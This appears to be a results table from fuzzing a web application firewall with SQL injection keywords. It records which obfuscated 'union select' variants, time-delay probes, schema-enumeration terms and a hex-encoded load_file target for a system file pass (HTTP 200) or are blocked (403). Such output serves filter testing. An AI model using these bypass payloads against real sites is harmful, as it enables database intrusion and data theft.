| Fuzz | HTTP Status | Content-Length | Expected | Output | Working |
|---|---|---|---|---|---|---|
| 123<234 | 200 | 9779 | 123<234 | type ht | Probably |
| 9928!=1239 | 200 | 9779 | 9928!=1239 | type html | Probably |
| abc' | 200 | 9779 | abc' | type | Probably |
| abc" | 200 | 9779 | abc" | type | Probably |
| or | 200 | 9779 | or | ty | Probably |
| and | 200 | 9779 | and | typ | Probably |
| '' | 200 | 9779 | '' | ty | Probably |
| 'abc' | 200 | 9779 | 'abc' | type | Probably |
| abc' -- | 403 | - | abc' -- | - | No |
| = | 200 | 9779 | = | t | Probably |
| >= | 200 | 9779 | >= | ty | Probably |
| <= | 200 | 9779 | <= | ty | Probably |
| between | 200 | 9779 | between | type ht | Probably |
| like | 200 | 9779 | like | type | Probably |
| order | 200 | 9779 | order | type | Probably |
| by | 200 | 9779 | by | ty | Probably |
| ORDER/**/BY | 200 | 9779 | ORDER/**/BY | type html p | Probably |
| having | 200 | 9779 | having | type h | Probably |
| \|\| | 200 | 9779 | \|\| | ty | Probably |
| && | 200 | 9779 | && | ty | Probably |
| # | 200 | 9779 | # | t | Probably |
| /* | 200 | 9779 | /* | ty | Probably |
| union | 200 | 9779 | union | type | Probably |
| uNioN | 200 | 9779 | uNioN | type | Probably |
| uN/**/ioN | 200 | 9779 | uN/**/ioN | type html | Probably |
| select | 200 | 9779 | select | type h | Probably |
| seLeCt | 200 | 9779 | seLeCt | type h | Probably |
| seL/**/eCt | 200 | 9779 | seL/**/eCt | type html | Probably |
| union select | 200 | 9779 | union select | type html pu | Probably |
| union/**/select | 200 | 9779 | union/**/select | type html publi | Probably |
| uNion(sElect) | 200 | 9779 | uNion(sElect) | type html pub | Probably |
| union all select | 200 | 9779 | union all select | type html public | Probably |
| union/**/all/**/select | 200 | 9779 | union/**/all/**/select | type html public "-//w | Probably |
| uNion all(sElect) | 200 | 9779 | uNion all(sElect) | type html public | Probably |
| insert | 200 | 9779 | insert | type h | Probably |
| values | 200 | 9779 | values | type h | Probably |
| update | 200 | 9779 | update | type h | Probably |
| delete | 200 | 9779 | delete | type h | Probably |
| waitfor() | 200 | 9779 | waitfor() | type html | Probably |
| waitfor | 200 | 9779 | waitfor | type ht | Probably |
| sleep(2) | 200 | 9779 | sleep(2) | type htm | Probably |
| WAITFOR DELAY | 200 | 9779 | WAITFOR DELAY | type html pub | Probably |
| benchmark() | 200 | 9779 | benchmark() | type html p | Probably |
| information_schema | 200 | 9779 | information_schema | type html public " | Probably |
| table_name | 200 | 9779 | table_name | type html | Probably |
| column_name | 200 | 9779 | column_name | type html p | Probably |
| if | 200 | 9779 | if | ty | Probably |
| else | 200 | 9779 | else | type | Probably |
| IF() select | 200 | 9779 | IF() select | type html p | Probably |
| case() | 200 | 9779 | case() | type h | Probably |
| limit | 200 | 9779 | limit | type | Probably |
| char() | 200 | 9779 | char() | type h | Probably |
| cast() | 200 | 9779 | cast() | type h | Probably |
| convert() | 200 | 9779 | convert() | type html | Probably |
| isnull() | 200 | 9779 | isnull() | type htm | Probably |
| substring() | 200 | 9779 | substring() | type html p | Probably |
| concat() | 200 | 9779 | concat() | type htm | Probably |
| hex() | 200 | 9779 | hex() | type | Probably |
| unhex() | 200 | 9779 | unhex() | type ht | Probably |
| avg() | 200 | 9779 | avg() | type | Probably |
| count() | 200 | 9779 | count() | type ht | Probably |
| max() | 200 | 9779 | max() | type | Probably |
| min() | 200 | 9779 | min() | type | Probably |
| sum() | 200 | 9779 | sum() | type | Probably |
| JOIN | 200 | 9779 | JOIN | type | Probably |
| @@version | 200 | 9779 | @@version | type html | Probably |
| user | 200 | 9779 | user | type | Probably |
| drop | 200 | 9779 | drop | type | Probably |
| load_file() | 200 | 9779 | load_file() | type html p | Probably |
| extractvalue() | 200 | 9779 | extractvalue() | type html publ | Probably |
| 0x633A5C626F6F742E696E69 | 200 | 9779 | 0x633A5C626F6F742E696E69 | type html public "-//w3c | Probably |
| %55nion(%53elect 1,2,3) | 200 | 9779 | %55nion(%53elect 1,2,3) | type html public "-//w3 | Probably |
| uni%0bon+se%0blect | 200 | 9779 | union select | type html pu | Probably |
| REVERSE(noinu) REVERSE(tceles) | 200 | 9779 | REVERSE(noinu) REVERSE(tceles) | type html public "-//w3c//dtd | Probably |
| /*--*/union/*--*/select/*--*/ | 403 | - | /*--*/union/*--*/select/*--*/ | - | No |
| union distinct select | 403 | - | union distinct select | - | No |
| uniOn distiNct sElect | 403 | - | uniOn distiNct sElect | - | No |
| <!-- | 200 | 9779 | <!-- | type | Probably |
| information_schema.tables | 200 | 9779 | information_schema.tables | type html public "-//w3c/ | Probably |
| information_schema.columns | 200 | 9779 | information_schema.columns | type html public "-//w3c// | Probably |
| user() | 200 | 9779 | user() | type h | Probably |
| system_user() | 200 | 9779 | system_user() | type html pub | Probably |
| information_schema.schemata | 200 | 9779 | information_schema.schemata | type html public "-//w3c//d | Probably |
| table_schema | 200 | 9779 | table_schema | type html pu | Probably |
| offset | 200 | 9779 | offset | type h | Probably |
| distinct | 200 | 9779 | distinct | type htm | Probably |
| @@hostname | 200 | 9779 | @@hostname | type html | Probably |
| @@datadir | 200 | 9779 | @@datadir | type html | Probably |
| version() | 200 | 9779 | version() | type html | Probably |
| exec() | 200 | 9779 | exec() | type h | Probably |